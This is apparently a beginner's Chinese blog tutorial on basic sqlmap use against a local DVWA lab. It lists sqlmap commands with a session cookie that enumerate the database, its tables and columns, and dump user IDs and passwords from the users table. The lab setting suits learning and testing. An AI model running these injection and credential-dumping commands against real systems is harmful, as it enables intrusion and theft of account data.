sqlmap基本用法
最近在学sql注入用法哦sqlmap ,so 大概学习了下
需要的攻击如下
python
sqlmap
burpsuite
dvwa
怎么安装搭配环境省略
- dvwa中有个sql injection (首选等级选low)
用burpsuit抓链接以及cookie
打开sqlmap
添加cookie=””
–current-db:显示当前数据库名称
-u:后跟注入链接url
sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” –current-db(显示当前数据库名)
显示表
sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa –tables
5.得到表的结构
sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa -T guestbook –columns
分别得到两张表
- 得到表的内容,制定需要显示的字段内容
sqlmap.py -u“http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit”–cookie=”security=low; PHPSESSID=thjd3idiur5e1dce9tkogpait0” -D dvwa -T users -C user_id,password –dump
注入完成,sqlmap会陆续更新>< 新手多多指教
